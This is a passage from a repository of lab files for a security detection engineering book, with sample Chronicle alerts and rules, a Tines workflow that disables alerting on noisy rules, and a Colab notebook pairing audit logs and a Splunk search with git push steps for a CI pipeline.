https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-08/lab-8.1/Rule Detections 2024-01-25T1416.pdf
--------------------------------------------------------------------------------
/chapter-08/lab-8.2/chronicle-alerts.json:
--------------------------------------------------------------------------------
1 | {
2 | "alerts": [
3 | {
4 | "asset": {
5 | "hostname": "host1234.altostrat.com"
6 | },
7 | "alertInfos": [
8 | {
9 | "name": "Antimalware Action Taken",
10 | "sourceProduct": "Microsoft ASC",
11 | "severity": "HIGH",
12 | "timestamp": "2020-11-15T07:21:35Z",
13 | "rawLog": "",
14 | "uri": [
15 | ""
16 | ],
17 | "udmEvent": {
18 | "metadata": {
19 | "eventTimestamp": "2020-11-15T07:21:35Z",
20 | "eventType": "SCAN_FILE",
21 | "vendorName": "Microsoft",
22 | "productName": "ASC",
23 | "productEventType": "Antimalware Action Taken",
24 | "description": "",
25 | "urlBackToProduct": "",
26 | "ingestedTimestamp": "2020-11-30T19:01:11.486605Z"
27 | },
28 | "principal": {
29 | "hostname": "host1234.altostrat.com"
30 | },
31 | "target": {
32 | "file": {
33 | "fullPath": ""
34 | }
35 | },
36 | "securityResult": [
37 | {
38 | "threatName": "WS.Reputation.1",
39 | "ruleName": "AntimalwareActionTaken",
40 | "summary": "Antimalware Action Taken",
41 | "description": "",
42 | "severity": "HIGH"
43 | }
44 | ]
45 | }
46 | }
47 | ]
48 | }
49 | ],
50 | "userAlerts": [
51 | {
52 | "user": {
53 | "email": "john.doe@altostrat.com"
54 | },
55 | "alertInfos": [
56 | {
57 | "name": "",
58 | "sourceProduct": "Office 365 Security and Compliance",
59 | "timestamp": "2020-11-15T13:15:00Z",
60 | "rawLog": "",
61 | "uri": [
62 | ""
63 | ],
64 | "udmEvent": {
65 | "metadata": {
66 | "eventTimestamp": "2020-11-15T13:15:00Z",
67 | "eventType": "EMAIL_TRANSACTION",
68 | "vendorName": "Microsoft",
69 | "productName": "Office 365 Security and Compliance",
70 | "productEventType": "",
71 | "description": "",
72 | "ingestedTimestamp": "2020-11-30T18:29:36.164727Z"
73 | },
74 | "securityResult": [
75 | {
76 | "ruleName": "ThreatManagement",
77 | "summary": "Email reported by user as malware or phish",
78 | "description": "",
79 | "severity": "INFORMATIONAL"
80 | }
81 | ],
82 | "network": {
83 | "email": {
84 | "from": "Webinars\\\\u003cwebinars@example.com\\\\u003e",
85 | "to": [
86 | "john.doe@altostrat.com"
87 | ]
88 | }
89 | }
90 | }
91 | }
92 | ]
93 | }
94 | ]
95 | }
--------------------------------------------------------------------------------
/chapter-08/lab-8.2/chronicle-listrules.json:
--------------------------------------------------------------------------------
1 | {
2 | "rules": [
3 | {
4 | "ruleId": "ru_e6abfcb5-1b85-41b0-b64c-695b3250436f",
5 | "versionId": "ru_e6abfcb5-1b85-41b0-b64c-695b3250436f@v_1602631093_146879000",
6 | "ruleName": "SampleRule",
7 | "metadata": {
8 | "description": "Sample Description of the latest version of the Rule",
9 | "author": "author@example.com"
10 | },
11 | "ruleText": "rule SampleRule {
12 | // Multi event rule to detect logins from a single user for
13 | // multiple cities within a 5 minute window.
14 | meta:
15 | description = \"Sample Description of the latest version of the Rule\"
16 | author = \"author@example.com\"
17 | events:
18 | $e.metadata.event_type = \"USER_LOGIN\"
19 | $e.principal.user.userid = $user
20 | $e.principal.location.city = $city
21 | match:
22 | $user over 5m
23 | condition:
24 | #city > 1
25 | } ",
26 | "liveRuleEnabled": true,
27 | "versionCreateTime": "2020-10-13T23:18:13.146879Z",
28 | "compilationState": "SUCCEEDED"
29 | "ruleType": "MULTI_EVENT",
30 | },
31 | {
32 | "ruleId": "ru_1971c2ac-8d5b-41aa-bb30-f95d220e9439",
33 | "versionId": "ru_1971c2ac-8d5b-41aa-bb30-f95d220e9439@v_1598398482_260223000",
34 | "ruleName": "SampleRule2",
35 | "metadata": {
36 | "description": "Sample Description of the latest version of the Rule",
37 | "author": "author2@example.com"
38 | },
39 | "ruleText": "rule SampleRule2 {
40 | meta:
41 | description = \"Sample Description of the latest version of the Rule\"
42 | author = \"author2@example.com\"
43 | events:
44 | // Single event rule to generate detections for network events involving example.com
45 | $event.network.dns.questions.name = \"example.com\"
46 | condition:
47 | $event
48 | } ",
49 | "versionCreateTime": "2020-8-25T23:34:42.260223",
50 | "compilationState": "SUCCEEDED"
51 | "ruleType": "SINGLE_EVENT",
52 |
53 | }
54 | ]
55 | }
--------------------------------------------------------------------------------
/chapter-08/lab-8.2/tines-count-google-chronicle-alerts-and-disable-noisy-rules.json:
--------------------------------------------------------------------------------
1 | {
2 | "schema_version": 18,
3 | "standard_lib_version": 42,
4 | "action_runtime_version": 6,
5 | "name": "Count-Google-Chronicle-Alerts-and-Disable-Noisy-Rules",
6 | "description": "Retrieve recent alerts from Google Chronicle, deduplicate similar alerts each day, and create Jira tickets for tracking.",
7 | "guid": "f49b6b8e63038426b63e19b46bb023db",
8 | "slug": "count_google_chronicle_alerts_and_disable_noisy_rules",
9 | "agents": [
10 | {
11 | "type": "Agents::HTTPRequestAgent",
12 | "name": "Get Chronicle Recent Alerts",
13 | "disabled": false,
14 | "description": null,
15 | "guid": "fadda0304fd697a9d14b062f7c35be77",
16 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
17 | "options": {
18 | "url": "https://backstory.googleapis.com/v1/alert/listalerts",
19 | "content_type": "application_json",
20 | "method": "get",
21 | "payload": {
22 | "start_time": "< MINUS(%, 800000000) |> DATE(%, \"%Y-%m-%dT%H:%M:%SZ\")>>",
23 | "end_time": "<>",
24 | "page_size": "100"
25 | },
26 | "headers": {
27 | "Authorization": "Bearer <>"
28 | }
29 | },
30 | "reporting": {
31 | "time_saved_value": 0,
32 | "time_saved_unit": "minutes"
33 | },
34 | "monitoring": {
35 | "monitor_all_events": false,
36 | "monitor_failures": false,
37 | "monitor_no_events_emitted": null
38 | },
39 | "template": {
40 | "created_from_template_guid": null,
41 | "created_from_template_version": null
42 | },
43 | "visuals": {
44 | "card_icon_image_contents": null,
45 | "card_icon_image_filename": null,
46 | "card_icon_name": null
47 | },
48 | "width": null,
49 | "schedule": []
50 | },
51 | {
52 | "type": "Agents::EventTransformationAgent",
53 | "name": "Explode Alerts",
54 | "disabled": false,
55 | "description": null,
56 | "guid": "1fb0b928bc45d9bc5cd9659d2b2228c0",
57 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
58 | "options": {
59 | "mode": "explode",
60 | "path": "=get_chronicle_recent_alerts.body.alerts",
61 | "to": "alert"
62 | },
63 | "reporting": {
64 | "time_saved_value": 0,
65 | "time_saved_unit": "minutes"
66 | },
67 | "monitoring": {
68 | "monitor_all_events": false,
69 | "monitor_failures": false,
70 | "monitor_no_events_emitted": null
71 | },
72 | "template": {
73 | "created_from_template_guid": null,
74 | "created_from_template_version": null
75 | },
76 | "visuals": {
77 | "card_icon_image_contents": null,
78 | "card_icon_image_filename": null,
79 | "card_icon_name": null
80 | },
81 | "width": null,
82 | "schedule": null
83 | },
84 | {
85 | "type": "Agents::EventTransformationAgent",
86 | "name": "Explode securityResult from Alert",
87 | "disabled": false,
88 | "description": null,
89 | "guid": "79f44d163dcd8b66ff752d88fb13af87",
90 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
91 | "options": {
92 | "mode": "explode",
93 | "path": "=explode_alerts.alert.securityResult.ruleName",
94 | "to": "ruleName"
95 | },
96 | "reporting": {
97 | "time_saved_value": 0,
98 | "time_saved_unit": "minutes"
99 | },
100 | "monitoring": {
101 | "monitor_all_events": false,
102 | "monitor_failures": false,
103 | "monitor_no_events_emitted": null
104 | },
105 | "template": {
106 | "created_from_template_guid": null,
107 | "created_from_template_version": null
108 | },
109 | "visuals": {
110 | "card_icon_image_contents": null,
111 | "card_icon_image_filename": null,
112 | "card_icon_name": null
113 | },
114 | "width": null,
115 | "schedule": null
116 | },
117 | {
118 | "type": "Agents::HTTPRequestAgent",
119 | "name": "Disable Alerting for a Rule in Chronicle",
120 | "disabled": false,
121 | "description": "Disable alerting for a detection rule in Chronicle",
122 | "guid": "d06c58c9ae33a12c05ecc85814f230c8",
123 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
124 | "options": {
125 | "url": "https://backstory.googleapis.com/v2/detect/rules/<>:disableAlerting",
126 | "content_type": "json",
127 | "method": "post",
128 | "payload": {},
129 | "headers": {
130 | "Authorization": "Bearer <>"
131 | }
132 | },
133 | "reporting": {
134 | "time_saved_value": 0,
135 | "time_saved_unit": "minutes"
136 | },
137 | "monitoring": {
138 | "monitor_all_events": false,
139 | "monitor_failures": false,
140 | "monitor_no_events_emitted": null
141 | },
142 | "template": {
143 | "created_from_template_guid": "8950107bc2573c043bd7cfca091a45738c746652a339845e3bc4256d5547ca3e",
144 | "created_from_template_version": null
145 | },
146 | "visuals": {
147 | "card_icon_image_contents": null,
148 | "card_icon_image_filename": null,
149 | "card_icon_name": null
150 | },
151 | "width": null,
152 | "schedule": null
153 | },
154 | {
155 | "type": "Agents::TriggerAgent",
156 | "name": "If 10 sets of 10 rule bursts",
157 | "disabled": false,
158 | "description": null,
159 | "guid": "a8795deda8ce32c2c40c49c1ccf97d0e",
160 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
161 | "options": {
162 | "rules": [
163 | {
164 | "type": "field>=value",
165 | "value": "10",
166 | "path": "=COUNTIF(explode_securityresult_from_alert.guid)"
167 | }
168 | ]
169 | },
170 | "reporting": {
171 | "time_saved_value": 0,
172 | "time_saved_unit": "minutes"
173 | },
174 | "monitoring": {
175 | "monitor_all_events": false,
176 | "monitor_failures": false,
177 | "monitor_no_events_emitted": null
178 | },
179 | "template": {
180 | "created_from_template_guid": null,
181 | "created_from_template_version": null
182 | },
183 | "visuals": {
184 | "card_icon_image_contents": null,
185 | "card_icon_image_filename": null,
186 | "card_icon_name": null
187 | },
188 | "width": null
189 | },
190 | {
191 | "type": "Agents::EventTransformationAgent",
192 | "name": "Implode securityResults to Array",
193 | "disabled": false,
194 | "description": null,
195 | "guid": "35f5c09a815f2406d96ddf7b9a87cecc",
196 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
197 | "options": {
198 | "mode": "implode",
199 | "item_path": "=explode_securityresult_from_alert.ruleName",
200 | "guid_path": "=explode_securityresult_from_alert.guid",
201 | "size_path": "=10"
202 | },
203 | "reporting": {
204 | "time_saved_value": 0,
205 | "time_saved_unit": "minutes"
206 | },
207 | "monitoring": {
208 | "monitor_all_events": false,
209 | "monitor_failures": false,
210 | "monitor_no_events_emitted": null
211 | },
212 | "template": {
213 | "created_from_template_guid": null,
214 | "created_from_template_version": null
215 | },
216 | "visuals": {
217 | "card_icon_image_contents": null,
218 | "card_icon_image_filename": null,
219 | "card_icon_name": null
220 | },
221 | "width": null,
222 | "schedule": null
223 | },
224 | {
225 | "type": "Agents::HTTPRequestAgent",
226 | "name": "List Rules in Chronicle",
227 | "disabled": false,
228 | "description": "List detection rules in Chronicle",
229 | "guid": "b1198428468ad5208b74b3bd91b03e30",
230 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
231 | "options": {
232 | "url": "https://backstory.googleapis.com/v2/detect/rules/",
233 | "content_type": "json",
234 | "method": "get",
235 | "payload": {},
236 | "headers": {
237 | "Authorization": "Bearer <>"
238 | }
239 | },
240 | "reporting": {
241 | "time_saved_value": 0,
242 | "time_saved_unit": "minutes"
243 | },
244 | "monitoring": {
245 | "monitor_all_events": false,
246 | "monitor_failures": false,
247 | "monitor_no_events_emitted": null
248 | },
249 | "template": {
250 | "created_from_template_guid": "b27608bb942d18b66328df5ec059581207a6c47004041ebf6fee29fc3dfbb91e",
251 | "created_from_template_version": null
252 | },
253 | "visuals": {
254 | "card_icon_image_contents": null,
255 | "card_icon_image_filename": null,
256 | "card_icon_name": null
257 | },
258 | "width": null,
259 | "schedule": null
260 | },
261 | {
262 | "type": "Agents::TriggerAgent",
263 | "name": "If ruleName in ruleList",
264 | "disabled": false,
265 | "description": null,
266 | "guid": "e0ffa9ecdcf2b36f1cc90b6d84708842",
267 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
268 | "options": {
269 | "rules": [
270 | {
271 | "type": "in",
272 | "value": "explode_alerts.alert.securityResult.ruleName",
273 | "path": "=list_rules_in_chronicle.rules.ruleName"
274 | }
275 | ]
276 | },
277 | "reporting": {
278 | "time_saved_value": 0,
279 | "time_saved_unit": "minutes"
280 | },
281 | "monitoring": {
282 | "monitor_all_events": false,
283 | "monitor_failures": false,
284 | "monitor_no_events_emitted": null
285 | },
286 | "template": {
287 | "created_from_template_guid": null,
288 | "created_from_template_version": null
289 | },
290 | "visuals": {
291 | "card_icon_image_contents": null,
292 | "card_icon_image_filename": null,
293 | "card_icon_name": null
294 | },
295 | "width": null
296 | }
297 | ],
298 | "diagram_notes": [],
299 | "links": [
300 | {
301 | "source": 0,
302 | "receiver": 1
303 | },
304 | {
305 | "source": 1,
306 | "receiver": 2
307 | },
308 | {
309 | "source": 2,
310 | "receiver": 5
311 | },
312 | {
313 | "source": 4,
314 | "receiver": 6
315 | },
316 | {
317 | "source": 5,
318 | "receiver": 4
319 | },
320 | {
321 | "source": 6,
322 | "receiver": 7
323 | },
324 | {
325 | "source": 7,
326 | "receiver": 3
327 | }
328 | ],
329 | "diagram_layout": "{\"fadda0304fd697a9d14b062f7c35be77\":[600,315],\"1fb0b928bc45d9bc5cd9659d2b2228c0\":[600,405],\"79f44d163dcd8b66ff752d88fb13af87\":[600,495],\"d06c58c9ae33a12c05ecc85814f230c8\":[600,1005],\"a8795deda8ce32c2c40c49c1ccf97d0e\":[600,750],\"35f5c09a815f2406d96ddf7b9a87cecc\":[600,630],\"b1198428468ad5208b74b3bd91b03e30\":[600,840],\"e0ffa9ecdcf2b36f1cc90b6d84708842\":[600,930]}",
330 | "send_to_story_enabled": false,
331 | "entry_agent_guid": null,
332 | "exit_agent_guids": [],
333 | "exit_agent_guid": null,
334 | "api_entry_action_guids": [],
335 | "api_exit_action_guids": [],
336 | "keep_events_for": 86400,
337 | "reporting_status": true,
338 | "send_to_story_access": null,
339 | "story_library_metadata": {
340 | "tags": [
341 | "A1003",
342 | "A2005",
343 | "Alerts",
344 | "Case Management",
345 | "Chronicle",
346 | "Google",
347 | "Intermediate",
348 | "A2001"
349 | ],
350 | "icons": [
351 | "google",
352 | "👯",
353 | "jira"
354 | ],
355 | "visibility": "public"
356 | },
357 | "monitor_failures": false,
358 | "send_to_stories": [],
359 | "form": null,
360 | "synchronous_webhooks_enabled": false,
361 | "forms": [],
362 | "pages": [],
363 | "tags": [],
364 | "time_saved_unit": "minutes",
365 | "time_saved_value": 0,
366 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
367 | "integration_product": null,
368 | "integration_vendor": null,
369 | "exported_at": "2024-01-29T00:41:25Z",
370 | "icon": ":google:",
371 | "integrations": []
372 | }
--------------------------------------------------------------------------------
/chapter-09/lab-9.1/atlassian_jql-cheat-sheet.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-09/lab-9.1/atlassian_jql-cheat-sheet.pdf
--------------------------------------------------------------------------------
/chapter-09/references/Beyond-the-basics-of-scaling-agile-white-paper.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-09/references/Beyond-the-basics-of-scaling-agile-white-paper.pdf
--------------------------------------------------------------------------------
/chapter-10/diagrams/L1-WorkflowPattern.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-10/diagrams/L1-WorkflowPattern.png
--------------------------------------------------------------------------------
/chapter-10/diagrams/L2-WorkflowPattern.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-10/diagrams/L2-WorkflowPattern.png
--------------------------------------------------------------------------------
/chapter-10/diagrams/L3-WorkfowPattern.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-10/diagrams/L3-WorkfowPattern.png
--------------------------------------------------------------------------------
/chapter-10/lab-10.1/splunk_spl_dev.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "nbformat": 4,
3 | "nbformat_minor": 0,
4 | "metadata": {
5 | "colab": {
6 | "provenance": []
7 | },
8 | "kernelspec": {
9 | "name": "python3",
10 | "display_name": "Python 3"
11 | },
12 | "language_info": {
13 | "name": "python"
14 | }
15 | },
16 | "cells": [
17 | {
18 | "cell_type": "code",
19 | "execution_count": null,
20 | "metadata": {
21 | "id": "ASWk1jCApXkF"
22 | },
23 | "outputs": [],
24 | "source": []
25 | },
26 | {
27 | "cell_type": "markdown",
28 | "source": [
29 | "# Logging Artifacts"
30 | ],
31 | "metadata": {
32 | "id": "8D3WjDxdqHfW"
33 | }
34 | },
35 | {
36 | "cell_type": "markdown",
37 | "source": [
38 | "Use this section to keep your suggested logs for the use case"
39 | ],
40 | "metadata": {
41 | "id": "mAILNiF6qeCU"
42 | }
43 | },
44 | {
45 | "cell_type": "markdown",
46 | "source": [
47 | "\n",
48 | "\n",
49 | "```\n",
50 | "type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"sshd\" exe=\"/usr/sbin/sshd\" key=(null)\n",
51 | "type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
52 | "type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
53 | "type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"bash\" exe=\"/usr/bin/bash\" key=(null)\n",
54 | "type=CWD msg=audit(1664132305.181:240): cwd=\"/home/jsmith\"\n",
55 | "type=PATH msg=audit(1664132305.181:241): item=0 name=\"/bin/ls\" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0\n",
56 | "type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
57 | "```\n",
58 | "\n"
59 | ],
60 | "metadata": {
61 | "id": "svFdMWyNqmUB"
62 | }
63 | },
64 | {
65 | "cell_type": "code",
66 | "source": [
67 | "#grab log data as string and check for accuracy\n",
68 | "file = open('tests/audit-example-log.txt', 'r')\n",
69 | "log_contents = file.read()"
70 | ],
71 | "metadata": {
72 | "id": "Z_LxfbzXtR-O"
73 | },
74 | "execution_count": null,
75 | "outputs": []
76 | },
77 | {
78 | "cell_type": "code",
79 | "source": [
80 | "print(log_contents)"
81 | ],
82 | "metadata": {
83 | "colab": {
84 | "base_uri": "https://localhost:8080/"
85 | },
86 | "id": "fKz-x9nOtnFh",
87 | "outputId": "fd6fc210-23f9-449c-f083-eb1a39a6098d"
88 | },
89 | "execution_count": null,
90 | "outputs": [
91 | {
92 | "output_type": "stream",
93 | "name": "stdout",
94 | "text": [
95 | "type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"sshd\" exe=\"/usr/sbin/sshd\" key=(null)\n",
96 | "type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
97 | "type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
98 | "type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"bash\" exe=\"/usr/bin/bash\" key=(null) \n",
99 | "type=CWD msg=audit(1664132305.181:240): cwd=\"/home/jsmith\"\n",
100 | "type=PATH msg=audit(1664132305.181:241): item=0 name=\"/bin/ls\" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0\n",
101 | "type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n"
102 | ]
103 | }
104 | ]
105 | },
106 | {
107 | "cell_type": "markdown",
108 | "source": [
109 | "# Splunk SPL Dev"
110 | ],
111 | "metadata": {
112 | "id": "ptjMJSzCqQE2"
113 | }
114 | },
115 | {
116 | "cell_type": "markdown",
117 | "source": [
118 | "Use this section to craft out your SPL"
119 | ],
120 | "metadata": {
121 | "id": "uhIPpPN6qxUq"
122 | }
123 | },
124 | {
125 | "cell_type": "markdown",
126 | "source": [
127 | "\n",
128 | "\n",
129 | "```\n",
130 | "index=main exe=*bash\n",
131 | "```\n",
132 | "\n"
133 | ],
134 | "metadata": {
135 | "id": "tEBqqd-Pq1XB"
136 | }
137 | },
138 | {
139 | "cell_type": "code",
140 | "source": [
141 | "spl_search = 'index=main exe=*bash'"
142 | ],
143 | "metadata": {
144 | "id": "tJ34Zr7Bt26R"
145 | },
146 | "execution_count": null,
147 | "outputs": []
148 | },
149 | {
150 | "cell_type": "markdown",
151 | "source": [
152 | "# Send to CI/CD Pipeline"
153 | ],
154 | "metadata": {
155 | "id": "rxnHPC35qT8K"
156 | }
157 | },
158 | {
159 | "cell_type": "code",
160 | "source": [
161 | "#grab github access token\n",
162 | "from google.colab import userdata\n",
163 | "GITHUB_TOKEN=userdata.get('GITHUB_TOKEN')\n",
164 | "print(type(GITHUB_TOKEN)) #verify something is populated"
165 | ],
166 | "metadata": {
167 | "colab": {
168 | "base_uri": "https://localhost:8080/"
169 | },
170 | "id": "JKZqJ2luwdwx",
171 | "outputId": "d5093d6d-eaa7-42cd-eacc-a4c0ab7f124e"
172 | },
173 | "execution_count": null,
174 | "outputs": [
175 | {
176 | "output_type": "stream",
177 | "name": "stdout",
178 | "text": [
179 | "\n"
180 | ]
181 | }
182 | ]
183 | },
184 | {
185 | "cell_type": "code",
186 | "source": [
187 | "#do git session activity\n",
188 | "%cd /content\n",
189 | "!git config --global user.name \"Dennis Chow\"\n",
190 | "!git config --global user.email \"dchow@xtecsystems.com\"\n",
191 | "!git clone https://$GITHUB_TOKEN@github.com/dc401/splunk-integration-test-ci-demo.git\n",
192 | "%cd splunk-integration-test-ci-demo\n",
193 | "!cp /content/buildspec.txt /content/splunk-integration-test-ci-demo\n",
194 | "!git add buildspec.txt\n",
195 | "!git commit -m \"added buildspec\"\n",
196 | "!git push\n",
197 | "!git status"
198 | ],
199 | "metadata": {
200 | "colab": {
201 | "base_uri": "https://localhost:8080/"
202 | },
203 | "id": "3G14hifDqKje",
204 | "outputId": "f01c39a8-6336-4ed4-a817-7f7b4c1d01d7"
205 | },
206 | "execution_count": null,
207 | "outputs": [
208 | {
209 | "output_type": "stream",
210 | "name": "stdout",
211 | "text": [
212 | "/content\n",
213 | "Cloning into 'splunk-integration-test-ci-demo'...\n",
214 | "remote: Enumerating objects: 15, done.\u001b[K\n",
215 | "remote: Counting objects: 100% (15/15), done.\u001b[K\n",
216 | "remote: Compressing objects: 100% (12/12), done.\u001b[K\n",
217 | "remote: Total 15 (delta 1), reused 4 (delta 1), pack-reused 0\u001b[K\n",
218 | "Receiving objects: 100% (15/15), 6.58 KiB | 6.58 MiB/s, done.\n",
219 | "Resolving deltas: 100% (1/1), done.\n",
220 | "/content/splunk-integration-test-ci-demo\n",
221 | "[main 7d8a12f] added buildspec\n",
222 | " 1 file changed, 2 insertions(+)\n",
223 | " create mode 100644 buildspec.txt\n",
224 | "Enumerating objects: 4, done.\n",
225 | "Counting objects: 100% (4/4), done.\n",
226 | "Delta compression using up to 2 threads\n",
227 | "Compressing objects: 100% (2/2), done.\n",
228 | "Writing objects: 100% (3/3), 345 bytes | 345.00 KiB/s, done.\n",
229 | "Total 3 (delta 1), reused 2 (delta 1), pack-reused 0\n",
230 | "remote: Resolving deltas: 100% (1/1), completed with 1 local object.\u001b[K\n",
231 | "To https://github.com/dc401/splunk-integration-test-ci-demo.git\n",
232 | " 7820448..7d8a12f main -> main\n",
233 | "On branch main\n",
234 | "Your branch is up to date with 'origin/main'.\n",
235 | "\n",
236 | "nothing to commit, working tree clean\n"
237 | ]
238 | }
239 | ]
240 | },
241 | {
242 | "cell_type": "code",
243 | "source": [
244 | "#revert from clone if needed\n",
245 | "%cd /content\n",
246 | "!rm -rf ./splunk-integration-test-ci-demo\n",
247 | "!pwd"
248 | ],
249 | "metadata": {
250 | "colab": {
251 | "base_uri": "https://localhost:8080/"
252 | },
253 | "id": "g4IX1qGrydJC",
254 | "outputId": "d5859ad8-28b5-46f0-eb52-ae4b7a5653f4"
255 | },
256 | "execution_count": null,
257 | "outputs": [
258 | {
259 | "output_type": "stream",
260 | "name": "stdout",
261 | "text": [
262 | "/content\n",
263 | "/content\n"
264 | ]
265 | }
266 | ]
267 | },
268 | {
269 | "cell_type": "markdown",
270 | "source": [
271 | "Ensure that you have validated findings based on the CI tests and deployment"
272 | ],
273 | "metadata": {
274 | "id": "AtSoltIyvFvY"
275 | }
276 | },
277 | {
278 | "cell_type": "code",
279 | "source": [
280 | "#check on runner status\n",
281 | "!git log"
282 | ],
283 | "metadata": {
284 | "colab": {
285 | "base_uri": "https://localhost:8080/"
286 | },
287 | "id": "mg4tJmZDxMtU",
288 | "outputId": "046168d0-784c-4238-8ba0-e262f3cf451d"
289 | },
290 | "execution_count": null,
291 | "outputs": [
292 | {
293 | "output_type": "stream",
294 | "name": "stdout",
295 | "text": [
296 | "\u001b[33mcommit 7d8a12f4158b208646ba24d05535a8bb238969e7\u001b[m\u001b[33m (\u001b[m\u001b[1;36mHEAD -> \u001b[m\u001b[1;32mmain\u001b[m\u001b[33m, \u001b[m\u001b[1;31morigin/main\u001b[m\u001b[33m, \u001b[m\u001b[1;31morigin/HEAD\u001b[m\u001b[33m)\u001b[m\n",
297 | "Author: Dennis Chow \n",
298 | "Date: Mon Jan 22 01:34:30 2024 +0000\n",
299 | "\n",
300 | " added buildspec\n",
301 | "\n",
302 | "\u001b[33mcommit 78204483da12ad1e2b39a372f0894564411c9939\u001b[m\n",
303 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
304 | "Date: Sun Jan 21 19:29:02 2024 -0600\n",
305 | "\n",
306 | " Delete buildspec.txt\n",
307 | "\n",
308 | "\u001b[33mcommit fbfee73846d60f8e51b4f602a4c75b5f04d64de2\u001b[m\n",
309 | "Author: Dennis Chow \n",
310 | "Date: Mon Jan 22 01:23:26 2024 +0000\n",
311 | "\n",
312 | " added buildspec\n",
313 | "\n",
314 | "\u001b[33mcommit 55bd18a05a15a7cca1a0f3a9c814a16bf52236ac\u001b[m\n",
315 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
316 | "Date: Sun Jan 21 01:01:03 2024 -0600\n",
317 | "\n",
318 | " Add files via upload\n",
319 | "\n",
320 | "\u001b[33mcommit 4d9101913269461769bd8a8414f9d6ba3322d0ff\u001b[m\n",
321 | "Author: SCIS Security <4706268+dc401@users.noreply.github.com>\n",
322 | "Date: Sun Jan 21 00:32:35 2024 -0600\n",
323 | "\n",
324 | " Created using Colaboratory\n",
325 | "\n",
